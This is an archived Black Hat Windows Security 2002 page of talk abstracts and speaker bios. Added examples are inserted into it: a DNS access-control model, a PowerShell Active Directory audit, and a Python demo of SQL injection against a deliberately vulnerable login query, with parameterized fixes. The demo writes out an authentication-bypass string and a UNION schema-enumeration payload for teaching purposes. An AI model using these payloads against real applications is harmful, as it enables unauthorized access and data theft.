Black Hat Digital Self Defense
Speakers: Chip Andrews, Ofir Arkin, Jay Beale, Erik Pace Birkholz, Harlan Carvey, Stephen Dugan, Todd Feineman, Halvar Flake, JD Glaser, David Goldman, Jennifer S. Granick, Jeremiah Grossman, Sherief Hammad, Tony Harris, Jim Harrison, Andrew Hintz, Jesper M. Johansson, David Litchfield, Haroon Meer, Timothy Mullen, Joe Nocera, Laura A. Robinson, Tony Sager, Eric Schultze, Thomas Shinder, Murugiah Souppaya, Roelof Temmingh, Jonathan Wilkins

Black Hat Windows Security 2002: Speakers and Topics

Topic descriptions are listed alphabetically by speaker.
Presentations are now online and can be found beneath the speaker name on this page.
If you missed any of the talks or were not able to attend, audio and video are available from The Sound of Knowledge.

MS SQL Server Security Mysteries Explained
Chip Andrews,
[ Database Track ]

This presentation will focus on answering the most common questions asked by those seeking to secure applications based on Microsoft SQL Server. Whether you are a programmer, administrator, or a security professional, it is vital to understand the complete picture when deploying a SQL Server application.

Questions will include:

  • Is there any way to strengthen the native SQL Server security model?
  • What does a secure SQL Server deployment look like?
  • Which security model should I use and why?
  • How do I encrypt data in SQL Server?
  • Are privilege escalation attacks possible in SQL Server?
  • How do I implement SSL with SQL Server over TCP/IP?
  • How do I design secure SQL Server-based applications?
  • How do I secure managed .NET applications that inter-operate with SQL Server?
  • What is "Yukon" and what might it mean for the future of SQL Server?

These topics and others will be explored as we focus on SQL Server as a secure repository for your data.

Chip Andrews has been a software developer and an independent computer security consultant for more than 16 years and specializes in applying the skills obtained through security consulting to every aspect of product development. Chip maintains the web site that focuses on SQL Server security issues. Chip has also contributed the SQL Server chapter to the recently released book "Hacking Exposed: Windows 2000" (Scambray, McClure) by Osborne Press. He currently works as a Software Security Architect for Clarus Corporation.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

VoIP: The Next Generation of Phreaking
Ofir Arkin, Managing Security Architect , @stake
[ Network Track ]

"...It is no longer necessary to have a separate network for voice..."

Welcome to the next generation of security hazards and problems inherited from using one network for both data and voice. Welcome to the world of IP-based telephony (and Internet telephony), which not only provides exciting new technologies but also presents a new challenge for the security community in securing these networks.

Along with new technologies come their security problems. Some are inherited from the use of IP-based networks, some (new ones) result from design flaws and from the complexity of protocols and implementations, and some result from the combination of both worlds, telephony and IP.

This talk will also examine several scenarios for the deployment of VoIP from several architectural angles: the Internet, a corporation, an ITSP, and a telecom company. For each scenario the security problems will be highlighted and security design tips will be given.

Ofir Arkin, Managing Security Architect, @stake
With extensive knowledge of the information security field, Ofir Arkin has worked as a consultant for several European financial institutions, where he played the role of Senior Security Analyst and Chief Security Architect in major projects. His experience includes working for a leading Swiss bank, architecting the security of the bank's e-banking project.

Prior to joining @stake, Ofir acted as chief security architect for a 4th-generation telecom company, where he designed the overall security scheme for the company.

Ofir has published several papers as well as articles and advisories. The best known is the "ICMP Usage in Scanning" research paper. Some of his research has been mentioned in professional computer security magazines. He is an active member of the Honeynet Project and participated in writing the Honeynet team's book, "Know Your Enemy", published by Addison-Wesley.

Attacking and Defending DNS
Jay Beale, Founder & Principal Security Consultant, JJB Security Consulting and Training
Andrew Hintz, IBM

[ MS Apps Track ]

This talk follows the Attack and Defense format, illustrating the traditional attacks against DNS servers first and then showing how to harden your server or defense. The methods range from refusing queries from the "wrong" hosts to setting up split horizon DNS and firewalling. We'll consider platform-specific defenses on both Windows and Solaris.
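
The three defenses the abstract names, refusing queries from the "wrong" hosts, split-horizon DNS, and restricting zone transfers, reduced to the policy decisions a server makes per query. This is an added Python example, not material from the talk or its slides, and it models the semantics of a BIND-style allow-transfer, allow-recursion and view configuration rather than speaking DNS on the wire. The networks, host names and addresses are constructed for the example (RFC 1918 and documentation ranges).

```python
import ipaddress

# Constructed policy data for this example (not from the talk).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
SECONDARY_SERVERS = {ipaddress.ip_address("192.0.2.53")}  # only host allowed to pull AXFR

# Split horizon: one zone, two views.  The external view carries only the
# public-facing records with public addresses; the internal view adds the
# names and RFC 1918 addresses that outsiders have no business resolving.
ZONE = "example.com"
VIEWS = {
    "external": {
        "www.example.com": "203.0.113.10",
        "mail.example.com": "203.0.113.25",
    },
    "internal": {
        "www.example.com": "10.1.1.10",
        "mail.example.com": "10.1.1.25",
        "intranet.example.com": "10.1.2.5",
        "dc01.example.com": "10.1.0.1",
    },
}


def view_for(client_ip):
    """Choose the view a client is entitled to from its source address."""
    client = ipaddress.ip_address(client_ip)
    if any(client in net for net in INTERNAL_NETS):
        return "internal"
    return "external"


def handle_query(client_ip, qname, qtype="A", recursion_desired=False):
    """Return (rcode, answer) for one query, applying the controls in order:
    transfer ACL, recursion ACL, then the split-horizon lookup."""
    client = ipaddress.ip_address(client_ip)
    view = view_for(client_ip)

    # 1. Zone transfers go only to listed secondaries, and they receive the
    #    view they sit in; everyone else is refused outright.
    if qtype == "AXFR":
        if client in SECONDARY_SERVERS:
            return "NOERROR", sorted(VIEWS[view].items())
        return "REFUSED", None

    # 2. No open recursion: a name outside our zone is only resolved for
    #    internal clients; outsiders get authoritative answers or nothing.
    in_zone = qname == ZONE or qname.endswith("." + ZONE)
    if not in_zone:
        if recursion_desired and view == "internal":
            return "RECURSE", None  # hand off to the recursive resolver path
        return "REFUSED", None

    # 3. Split horizon: answer from the view this client is allowed to see.
    answer = VIEWS[view].get(qname)
    if answer is None:
        return "NXDOMAIN", None
    return "NOERROR", answer


if __name__ == "__main__":
    for src, name, kwargs in (
        ("10.2.3.4", "www.example.com", {}),
        ("198.51.100.7", "www.example.com", {}),
        ("198.51.100.7", "intranet.example.com", {}),
        ("198.51.100.7", "www.victim.example", {"recursion_desired": True}),
        ("198.51.100.7", "example.com", {"qtype": "AXFR"}),
    ):
        print(src, name, handle_query(src, name, **kwargs))
```

The order of the checks matters: the transfer and recursion ACLs are evaluated before any data is consulted, so an outsider never learns whether an internal-only name exists (it is REFUSED or NXDOMAIN in the external view either way), and an open-recursion probe from the Internet is refused before the server does any work on the attacker's behalf.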

Jay Beale is the founder and principal security consultant for JJB Security Consulting and Training. He is the Lead Developer of the Bastille Linux Project, which creates a hardening program for Linux and HP-UX. Jay is the author of a number of articles on computer security, along with the upcoming book "Locking Down Linux the Bastille Way" to be published in the second quarter of this year by Addison Wesley. You can learn more about his articles, talks, courses and consulting via

How to Fix A Broken Window
Erik Pace Birkholz, CISSP, Principal Consultant, Foundstone
[ Tools of the Trade Track ]

Part one: Intranet Penetration Testing: Discovering network negligence
Part two: Strengthening Microsoft: When #1 is not an option

Year 2001 was the year that got away. Our comfort zone crumbled. Seemingly well laid plans turned to dust. Systems crashed and networks halted as faceless network attacks tore through cyberspace. As a nation and an industry, we fell victim to devastating attacks that could have been avoided. Security and comfort slipped through our fingers and was gone.

Ladies and gentlemen, security has reached the board room. Management wants answers. They want solutions. Above all else they want peace of mind that this won’t happen again. Purse-strings are opening; now is the time for IT to make things right. Management finally understands a simple fact that can no longer be avoided: responsibility without authority is a recipe for failure.

C:\>net send * “Don’t expect secure networks if you haven’t empowered your internal security team.”

Security vs. usability may finally become a balanced equation. All the usability in the world isn’t worth a damn if your internal network is a wasteland of default configurations and blank passwords. Security teams are now a required internal resource. Contrary to popular belief there are NOT 24 working hours in a day. Security cannot be treated as a side order. The excuses need to stop - now.

Intranet Penetration Testing: Discovering network negligence
I will present a methodology with specific steps and public tools that will aid you in performing internal penetration tests. I will offer opinions on what should, and should not be tested by internal security teams. I will walk through examples and provide demonstrations showing time effective techniques to get the highest return on investment.

Then we will shift gears and begin the first ever interactive “choose your own adventure”. There will be a full network and the flow will be controlled by “you”, the class. As a team, we “choose our own adventure” and see where it leads us. The goal will be complete compromise of two domains and a database full of “fake” credit card information. I will be your guide, but your success is up to you as a class.

Strengthening Microsoft: When #1 is not an option
A no BS approach on making the best with what we’ve got. No more excuses, the tools and techniques are out there. We will discuss:

  • strong domain architectures
  • rigid user management
  • hardened applications
  • principle of least privilege
  • security baselines for systems
  • defense in depth
  • network segmentation
  • 3rd party audit

Erik Birkholz is a Principal Consultant for Foundstone. Erik's prime area of concentration is assessing Internet and Intranet security architectures and their components. Erik has performed nearly a hundred attack & penetration tests since he began his career in 1995. Erik also instructs Foundstone's "Ultimate Hacking: Hands On" and "Ultimate NT/2000 Security: Hands On" courses.

Prior to joining Foundstone, Inc., he served as Assessment Lead for Internet Security System's (ISS) West Coast Consulting Group. Before ISS, Erik worked for Ernst & Young's eSecurity Services. He was a member of their National Attack and Penetration team, and an instructor for their "Extreme Hacking" course. Erik also spent two years as a Research Analyst for the National Computer Security Association (NCSA).

Mr. Birkholz is a contributing author for the exciting new Hacking Exposed titles: Hacking Exposed: Windows 2000 & Hacking Exposed, Third Edition. Previously, Erik was featured in the international best seller, Hacking Exposed, Second Edition and has been published in The Journal of the National Computer Security Association and Foundstone's Digital Battlefield. He has also presented his research at The Black Hat Briefings and The Internet Security Conference (TISC).

Erik holds a BS in Computer Science from Dickinson College, Pennsylvania, where he was a 1999-2000 Metzger Conway Fellow, an annual award presented to a distinguished alumnus that has achieved excellence in their field of study. He is a Certified Information Systems Security Professional (CISSP) and a Microsoft Certified Systems Engineer (MCSE).

NT/2K Incident Response and Mining for Hidden Data:
Post Mortem of a Windows Box
Harlan Carvey
[ Deep Knowledge Track ]

Part 1: NT/2K Incident Response
Current reactions to security incidents against NT/2K systems seem to range from Homer Simpson ("If I didn't see it, it didn't happen") or rebooting the system, to paying thousands of dollars for a forensics analyst...with very little in between. A lot of extremely useful volatile information lives on a 'victim' machine, but is often overlooked because it is accessible from the "Dark Place", i.e., the command line. This volatile information can give the administrator an excellent view of the situation, and may prove useful in an investigation. This presentation will discuss a methodology and framework for incident response on NT/2K systems. Policies and procedures will be touched on, and various available tools and techniques will be demonstrated. Demonstrations will show what type of information can be collected, how to get it off of the 'victim' system cleanly, and what that information means to the administrator or investigator.

Part II: Hiding Data on NT/2K
GUI's like Windows are used to increase the efficiency of the user, but they also provide a curtain for a malicious user to hide behind. This presentation will demonstrate several techniques for hiding data on NT/2K systems, some of which are as old as DOS...but still work. Other techniques, such as steganography, will also be discussed. NTFS alternate data streams will be covered in detail, to include differences between NTFS4 (NT) and 5 (2K). Various tools to detect the presence of hidden data will be demonstrated, and techniques to prevent and detect the activity will be discussed.

Harlan Carvey is an information security consultant with a deep and ongoing curiosity into getting under the hood of NT/2K platforms. Conducting vulnerability assessments and penetration tests of NT led to a growth in his use of Perl, in order to prototype both offensive and defensive security tools. Performing incident response and forensics investigations at a large telecomm presented him with many interesting challenges and learning experiences. Harlan has had articles published on, as well as in the Information Security Bulletin. He holds a BSEE from the Virginia Military Institute, and an MSEE from the Naval Postgraduate School.

Protecting Your Cisco Infrastructure Against the Latest "Attacktecs"
Stephen Dugan, CCSI
[ Network Track ]

This Presentation will focus on Cisco Routers and Switches and the commands used to protect them. The presentation will also include a live demo of the commands in a Cisco Network. The Presentation and Demo will include:

  • Securing Device Access and Management Protocols
  • Stopping Console Password Recovery
  • Protecting L3 Routing Protocols
  • Eliminating ARP Spoofing Attacks
  • VLAN Implementation Issues

Stephen Dugan is currently an independent contract instructor and network engineer. He has been teaching Cisco networking for the last 3 years, focusing on router and switch configuration, voice/data integration, and network security. His students come mostly from Fortune 500 companies and large service providers. He also teaches private internal classes to Cisco employees. As a Sr. Network Engineer he has worked on the design and implementation of large enterprise, government contractor, and service provider networks. He is also working on a new series of security books entitled "Hacker Attacktecs." The first three planned books will cover Windows, Unix/Linux, and Cisco exploits and how to defend against them.

Third Generation Exploits on NT/Win2k Platforms
Halvar Flake, Reverse Engineer, Black Hat Consulting
[ Deep Knowledge Track ]

Because standard stack-smashing overflows are becoming rare in well-audited code, new ways of executing arbitrary code on attacked machines are badly needed. With the appearance of format string bugs and malloc()/free() manipulation, the attacking side has two powerful techniques for writing more or less arbitrary data to more or less arbitrary locations.

Assuming we classify the different overrun exploitation techniques into generations it could look like this:

  • Generation 1: Standard return address overwrites
  • Generation 2: Frame pointer overwrites, off-by-ones etc.
  • Generation 3: malloc()/free() overwrites, format bugs etc.

While third generation exploits have been documented on *NIX platforms, documentation concerning their exploitation under NT/Win2k is rare. But this class of vulnerabilities is especially interesting from the reverse engineer's perspective on closed-source platforms, as traditional means of vulnerability research (e.g. stress testing with tools like Retina or Hailstorm) fail to detect these problems.

This speech will consist of two halves: The first half will cover format string vulnerabilities, covering all aspects ranging from detection (both in source and binary) to reliable exploitation in multithreaded environments without killing the exploited service. The second half of the speech will focus on malloc()/free() overwrites, explaining their general principle, documenting the different implementations of heap management under NT/Win2k (Borland C++, Visual C++, native operating system support in various versions etc.) and explaining how to exploit them in various situations.

Halvar Flake is Black Hat's new resident reverse engineer. Originating in the fields of copy protection and digital rights management, he gravitated more and more towards network security over time as he realized that constructive copy protection is more or less fighting windmills. After writing his first few exploits he was hooked and realized that reverse engineering experience is a very handy asset when dealing with COTS software. With extensive experience in reverse engineering, network security, penetration testing and exploit development he recently joined Black Hat as their main reverse engineer.

Routing and Tunneling Protocol Attacks
FX, Phenoelit
[ Network Track ]

The functionality and security of TCP/IP networks depends on the layer 2 and 3 traffic flow information. Attacks against these layers will immediately affect the operation of your network and the security of your servers.

This speech will provide you with the possible attack scenarios, layer 2 attacks (alias "interception"), router discovery and how an attacker can influence the flow of information in your network using a variety of routing protocols. Another key point is the impact of these attacks on your everyday business and why you should include the communication layers in your security considerations.

The finale will explain attacks against several tunneling mechanisms used for large corporate networks and how things like GRE, IPIP and others can enable intruders to attack your supposedly protected systems in RFC1918 networks. Also, the issues surrounding IPv6 islands will be discussed.

FX is the leader of the German Phenoelit group. His and the group's primary interests are in security implementations and the implications of standards or less-known protocols. FX works as a Security Solution Consultant at n.runs GmbH.

One-Way SQL Hacking: Futility of Firewalls in Web Hacking
JD Glaser, Director of Engineering, Foundstone
[ Database Track ]

Topics covered will be:

  • Overview of Web attacks
  • One-way attacks
  • SQL entry points
  • Privilege escalation
  • Installing a web-based SQL command prompt
  • Back-end database enumeration tool

One Way SQL Web Hacking: SQL Web hacking is the next generation of hacking "kung fu." This talk expands on our previous web talks with new SQL techniques for taking apart an e-commerce site. Join us for an eye-opening demonstration on what can go wrong with poorly secured Web applications, how severe the risks are, and how to protect yourself and your company.

We shall be covering vulnerabilities ranging from web server misconfigurations, improper URL parsing, application level vulnerabilities, Java application server hacking and some special advanced techniques. 

JD Glaser provides customized NT network security and audit tools for Foundstone. He specializes in Windows NT system software development and COM/DCOM application development. His most recent achievement was the successful formation of NT OBJECTives, Inc., a software company exclusively centered on building NT security tools. Since its inception, over 100,000 of those security tools have been downloaded and put into practice. In addition, he has written several critical, unique intrusion audit papers on NT intrusion forensic issues. Currently, JD has been retained as a featured speaker/trainer for all the Black Hat conferences on NT security issues.

The Deep Technical Audit: How to Mitigate the Risks Presented in Other Sessions
David Goldman, PriceWaterhouseCoopers
Todd Feinman, PriceWaterhouseCoopers
Joe Nocera, PriceWaterhouseCoopers

[ General Track ]

As Windows 2000, XP, and .Net Server are increasingly the platforms of choice for corporate and e-commerce initiatives, they are also increasingly the target of choice for hackers. And, as evidenced by this conference, television media, and Internet forums, there are a great number of security issues surrounding the Windows family of operating systems. However, through careful attention to system configuration, as well as a comprehensive and continuous program for auditing and monitoring system security, a high degree of reliance can be placed on Windows servers.

In this session, we will discuss the critical components of a deep technical assessment necessary to defend against today's known and tomorrow's unknown threats. These components will cover all areas of Windows security and provide a flexible framework to adapt that will allow you to develop a program customized for your environment. 

David Goldman is currently in PricewaterhouseCoopers' Global Risk Management Services - Security consulting practice and is focused on helping businesses secure their online environments. Leveraging his background in e-business systems and Internet-enabled application design, he facilitates the incorporation of sound security practices into corporate operations. Currently, he is managing the assessment, design, and implementation of security and controls on systems and applications across disparate environments. He specializes in Windows NT/2000 and has written several white papers and articles on the subject.

Digital Rights Management Legal Briefing
Jennifer S. Granick, Clinical Director of Stanford Law School Center for Internet and Society
[ Keynote ]

Jennifer Stisa Granick is a Lecturer in Law and Director of the Litigation Clinic at Stanford Law School's Center for Internet and Society. Ms. Granick's work focuses on the interaction of free speech, privacy, computer security, law and technology. She is on the Board of Directors of the Honeynet Project, a computer security research group, and has spoken at the National Security Agency, to law enforcement officials and to computer security professionals from the public and private sectors in the United States and abroad. Before joining Stanford Law School, Ms. Granick practiced criminal defense of unauthorized access, trade secret theft and email interception cases nationally. She has published articles on wiretap laws, workplace privacy and trademark law.

Web Application Security and Release of "WhiteHat Arsenal"
Jeremiah Grossman, Founder and Chairman of WhiteHat Security, Inc.
[ Tools of the Trade Track ]

Discussion will include the theory surrounding some of the more dangerous web application attacks known, how to test for them quickly and determine possible countermeasures. Insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. It is for these very reasons that WhiteHat Security Inc., is pleased to introduce its new release, "WhiteHat Arsenal", the next generation of professional web security audit software.

WH Arsenal possesses a powerful suite of GUI, browser-based web security tools. These capabilities let WH Arsenal complete painstaking web security pen-test work considerably faster and more effectively than any of the currently available tools. Imagine employing WH Arsenal to quickly customize and execute just about any web security attack possible and having those penetration attempts logged in XML format for later reporting or analysis.

Many experienced web security professionals tend to agree that even the best current web security scanners, which scan only for known vulnerabilities, achieve only very limited success or simply do not work at all. Furthermore, these types of tools often result in an enormous overflow of false positives. WhiteHat understands these frustrating shortcomings and is poised to revolutionize the way in which web applications are penetration tested.  

Jeremiah Grossman is the founder and chairman of WhiteHat Security, Inc. and former Yahoo! information security officer.

As information security officer at Yahoo!, Jeremiah designed, audited, and penetration-tested the company's web applications. As one of the world's busiest web properties, all of these applications demanded the highest level of security available.

Continuing his work of the past 5 years, Jeremiah researches and applies his expertise to information security with special emphasis on prevention of web application intrusion. Grossman has presented "Web Application Security" talks at many security conventions including the BlackHat Briefings, the Air Force and Technology Conference, Defcon and ToorCon. He is considered to be among the world's foremost web security experts.

NIST Recommendations for System Administrators for Securing Windows 2000 Professional
Tony Harris, Booz Allen
Murugiah Souppaya, NIST
[ MS Apps Track ]

Windows 2000 Professional has many security features System Administrators can enable to protect their users and their network.

This session will present the key ideas found in the NIST System Administration Guidance for Securing Microsoft Windows 2000 Professional System draft document. You will be presented with NIST's recommended practices for installing, configuring, and securing the Windows 2000 Professional operating system and popular applications. Various security settings for Windows 2000 Professional (registry settings, ACLs, services, binaries, and tools) will be reviewed. In addition, security configurations for various applications will be presented, such as the Symantec Norton AntiVirus, Network Associates McAfee, and F-Secure Anti-Virus virus scanners, the Microsoft IE and Netscape Communicator web browsers, the Microsoft Outlook and Eudora e-mail clients, and the Microsoft Office 2000 Professional productivity software.

Our document is available at:

Murugiah Souppaya works as a network administrator for the Computer Security Division in the Information Technology Laboratory at the National Institute of Standards and Technology.

Anthony Harris provides security consulting services to various government and corporate clients as the Penetration Testing Services lead in the Risk Management Technologies and Training group at Booz Allen Hamilton. Anthony has over 12 years of experience securely managing, designing, assessing, and penetration testing networked systems. Anthony has performed research and penetration testing for dozens of clients on hundreds of networks and uses the knowledge gained to develop secure networking and configuration solutions for various government and corporate clients.

Mobile Computing Security
Jesper M. Johansson, Senior Technologist, Microsoft's Security Strategies Group
[ General Track ]

Mobile computing is changing the landscape of organizational networks. Many organizations issue notebooks as standard equipment. However, not all mobile computers run operating systems like Linux, MacOS, and Windows. Many, such as Palm Inc.'s Palm series, and the plethora of pocket and hand-held PCs running Microsoft Windows CE, are called personal digital assistants and are themselves mobile computers. As mobile telephones become more powerful, they too will effectively become mobile computers. When attached to a network, many mobile computers are capable of acting as clients for organizational networks. This introduces a new dimension to the problem of information security.

In the past, computer security was concerned with controlling access to data that resided on workstations or was transmitted across networks. An unstated assumption was that physical security could be assured by protecting the endpoints of communication-the systems on which the data resided-and augmenting that protection with software controls such as cryptography and access control mechanisms. But once we put secret and valuable organizational data on a device that is designed to be used outside the confines of the organizational network, we are dealing with new security problems that have not yet received much attention in the literature.

The purpose of this presentation is to explore how the mobility of physical computing devices affects security. We classify the security issues involving these mobile client computers and briefly discuss some promising solution strategies to mitigate them.

Jesper M. Johansson is a senior technologist in Microsoft's Security Strategies group. His work at Microsoft deals with providing a more secure computing infrastructure and user experience across the range of products and services Microsoft sells. Prior to joining Microsoft, he was an Assistant Professor of Information Systems at Boston University. At Boston University he did research on information security, computer networking, and databases, and taught in those areas as well. Jesper M. Johansson has a Ph.D. in Management Information Systems from the University of Minnesota, a Masters of Science in Information Systems and a Masters of Business Administration from the University of Maryland, and a Bachelor of Arts in International Business/German with a minor in French Literature from the California State University, Fullerton.

Oracle Vulnerabilities
David Litchfield, Managing Director & Co-Founder, Next Generation Security Software
Sherief Hammad
[ Database Track ]

This talk will examine the security of Oracle 9iAS and what needs to be done to make it secure, exploring configuration issues, component architecture design flaws and software security holes such as buffer overruns. During the presentation David will explore PL/SQL, JSP and SOAP, and will demonstrate how the Oracle web front end can be compromised through a buffer overflow vulnerability and how, from there, a design flaw in the communication between components can be exploited to compromise the database server and gain complete control without needing to authenticate.

Web Vulnerability and SQL Injection Countermeasures:
Securing Your Servers From the Most Insidious of Attacks
Timothy Mullen, CIO, AnchorIS.Com
[ Database Track ]

The demands of the Global Marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas.

Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and properly configured, poor design methodology can leave our systems open for attack. This session will take a look at the vulnerabilities created by deploying weak web forms, the manipulation of URL structures, the injection of SQL code, and other methods. From there, we will take an in-depth look at what steps to take to minimize the impact of these attacks, including:

  • User input validation and sanitization
  • Variable declaration and typing
  • SQL procedure structure and parameter passing

Graduated examples of "good-better-best" programming practices will be made in detail, giving you the tools and strategies you need to immediately begin deploying more secure web-based applications.
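
A "good-better-best" progression of the kind this session describes, and at the same time the entry point the One-Way SQL Hacking session above attacks (an injectable login form used to bypass authentication and enumerate the back-end schema). This is an added Python example, not code from either talk; the table, accounts and injection strings are constructed for it, and it uses an in-memory SQLite database as a stand-in for SQL Server. The "best" tier the abstract lists, stored procedures with typed parameters, has no SQLite equivalent, so the example stops at parameter passing plus typing and allow-list validation.

```python
import re
import sqlite3


def build_db():
    """In-memory stand-in for the back-end database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password TEXT NOT NULL,
            is_admin INTEGER NOT NULL
        );
        INSERT INTO users (username, password, is_admin)
            VALUES ('alice', 'wonderland', 0), ('admin', 'hunter2', 1);
    """)
    return conn


# --- bad: the form fields are pasted straight into the statement.  A quote
#     in the input ends the literal and a "--" comments out the rest, so the
#     password check disappears and a UNION can read any table.
def login_vulnerable(conn, username, password):
    sql = ("SELECT username, is_admin FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


# --- good: parameter passing.  The driver sends the values separately from
#     the statement text, so quotes and comment markers stay data.
def login_parameterized(conn, username, password):
    sql = "SELECT username, is_admin FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# --- better: declare and type the inputs before any statement is built.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")  # allow-list, not a deny-list


def validate_username(username):
    """Reject anything outside the allow-list instead of trying to escape it."""
    if not USERNAME_RE.match(username):
        raise ValueError("username contains characters outside the allow-list")
    return username


def get_user_by_id(conn, raw_id):
    """Numeric parameter: coerce to int first, so '1 OR 1=1' is rejected
    before it can ever reach the statement."""
    user_id = int(raw_id)  # ValueError on anything that is not an integer
    sql = "SELECT username, is_admin FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchone()


def login_hardened(conn, username, password):
    """Validation and parameterization together: the input is checked against
    the allow-list, and even if it passes it is still never spliced into SQL."""
    validate_username(username)
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = build_db()
    bypass = "admin'--"
    enumerate_schema = "' UNION SELECT name, 1 FROM sqlite_master--"
    print("vulnerable, bypass:     ", login_vulnerable(db, bypass, "x"))
    print("vulnerable, enumerate:  ", login_vulnerable(db, enumerate_schema, "x"))
    print("parameterized, bypass:  ", login_parameterized(db, bypass, "x"))
    print("parameterized, legit:   ", login_parameterized(db, "admin", "hunter2"))
```

Run it and the first two lines show what the attacker sees through the concatenated query: the admin row without a password, then the names of the back-end tables. The parameterized variant returns an empty result for the same input because the whole string, apostrophe and comment marker included, is compared against the username column as data. Note that the "better" tier is a second layer, not a replacement for parameters: an allow-list alone still leaves any concatenated query exploitable through whatever characters it admits.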

Timothy Mullen is CIO and Chief Software Architect for AnchorIS.Com, a developer of secure enterprise-based accounting solutions. Mullen is also a columnist for SecurityFocus' Microsoft Focus section and a regular contributor of InFocus technical articles. A.k.a. Thor, he is the founder of the "Hammer of God" security co-op group.

The Devil Inside: Planning Security in Active Directory Design
Laura A. Robinson
[ MS Apps Track ]

While you may already know that Active Directory offers you the ability to designate and delegate administration far beyond what NT offered, you may not realize that an improperly designed Active Directory infrastructure leaves you most vulnerable to attacks and mismanagement from the very people to whom you've entrusted your day-to-day administration. Windows 2000 provides a wealth of mechanisms to help protect your network from intentional or accidental damage from inside, but many companies either fail to take advantage of the protections available, or build an incomplete design and end up with a false sense of security.

In this session, you'll be given an overview of Active Directory design, including placement of domain controllers, global catalog servers and DNS servers. We'll discuss namespace decisions and best practices, and we'll look at designing organizational units for delegation of administration and effective application of Group Policy. However, we'll also analyze some of the often-overlooked aspects of AD design. For example, did you know that a Domain Admin from any domain in the forest has the potential to cripple your entire forest? Did you know that it's not really possible to completely "lock out" a user who has Enterprise Admin capabilities? As with any network security, the biggest risk doesn't come from the technology itself, but how it is used. With a few simple best practices, you can significantly reduce the possibility that either a disgruntled or poorly educated employee may compromise the environment, but far too many companies overlook these best practices in pursuing ease of administration. If your network administrators are using built-in administrative accounts to perform much of their administration (even with the use of secondary logon); if they are locally administering domain controllers; if you have not changed several of the default security settings in Active Directory; if you aren't auditing crucial activities in Windows 2000; or if you haven't designed and delegated OUs properly, then your implementation is at risk. You may know about technologies provided in Windows 2000 to help you secure your environment, but you may not know the most effective ways to use them.

This session is not a presentation of exploits of the operating system. It is not intended to discuss the other layers of security you should implement in your network. However, if your focus has been primarily on firewalling your network, implementing intrusion detection and performing forensic analysis, then you've been missing a large piece of your network's security. Windows 2000 provides much more granular and effective security measures than NT did, but if your installations are still "out of the box" in terms of their security configurations and if you think your domain is a true security boundary, then it is time you took a second look.
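As an added check in the spirit of the session (not part of Robinson's material): before you can reason about who can cripple the forest, you need an accurate list of who holds forest-wide and domain-wide power, and whether the built-in Administrator accounts are still being used for daily work. The script below assumes the ActiveDirectory PowerShell module (RSAT), which postdates Windows 2000, and an account with read access across the forest; the 30-day window is an arbitrary choice.

```powershell
# Added audit script: enumerate the forest's privileged groups and check
# whether each domain's built-in Administrator (always RID 500, whatever
# it has been renamed to) has logged on recently. Assumes the
# ActiveDirectory module and forest-wide read rights.
Import-Module ActiveDirectory

$forest = Get-ADForest
$root   = $forest.RootDomain
$cutoff = (Get-Date).AddDays(-30)   # arbitrary "recently used" window

# Enterprise Admins and Schema Admins exist only in the forest root domain,
# but their membership reaches into every domain of the forest.
foreach ($group in 'Enterprise Admins', 'Schema Admins') {
    Write-Host "== $group ($root) =="
    Get-ADGroupMember -Identity $group -Server $root -Recursive |
        Select-Object -ExpandProperty SamAccountName
}

foreach ($domain in $forest.Domains) {
    Write-Host "== Domain Admins ($domain) =="
    Get-ADGroupMember -Identity 'Domain Admins' -Server $domain -Recursive |
        Select-Object -ExpandProperty SamAccountName

    # Build the RID-500 SID from the domain SID rather than trusting the
    # account name; a renamed Administrator is still RID 500.
    $adminSid = (Get-ADDomain -Server $domain).DomainSID.Value + '-500'
    $admin = Get-ADUser -Identity $adminSid -Server $domain -Properties LastLogonDate, Enabled
    $flag = if ($admin.LastLogonDate -gt $cutoff) { 'USED RECENTLY' } else { 'idle' }
    Write-Host ("built-in admin {0}\{1}: enabled={2} lastLogon={3} {4}" -f
        $domain, $admin.SamAccountName, $admin.Enabled, $admin.LastLogonDate, $flag)
}
```

Run it from a workstation, not from a domain controller, and with a read-only account: the session's point about not administering domain controllers locally applies to audits as much as to day-to-day work. A nested group or a service account appearing in the Domain Admins listing of any domain is the forest-wide exposure the session warns about, regardless of which domain it lives in.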

Laura Robinson is a consultant and trainer who specializes in Active Directory design and has been involved in architecting AD implementations ranging from 600 to 60,000 users, for companies supporting millions of customers. She authored several chapters of the Microsoft Press book "Windows 2000 TCP/IP Protocols and Services Technical Reference", has been working with Windows 2000 since Beta 1 and teaching it since Beta 2, and has continued her involvement in Microsoft's operating system technologies through her work with .Net servers in 2001. Laura is a Microsoft Certified Trainer and Systems Engineer on both NT and Windows 2000; a Certified Lotus Professional Systems Administrator, Application Developer and Instructor; and an instructor for Real World Security's @ctive Defense education series.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


Windows Security Configuration Guide
Tony W. Sager, The National Security Agency
[ Keynote ]

One of the most exciting and challenging aspects of network security is that it is shared across all aspects of our society. But this is also a great opportunity to explore the potential for dramatically greater cooperation between government and the private sector. With a shared problem, we have no choice but to pursue shared solutions.

The presentation discusses the development of the National Security Agency's Security Recommendation Guides to Windows 2000, a story still in progress. The specifics of the story are less important than some key themes that it illustrates: gaining agreement across a broad community of technical experts, translating vulnerability information into constructive action, building a support environment to integrate Guides into management of the network, and cooperation within government and with the public.

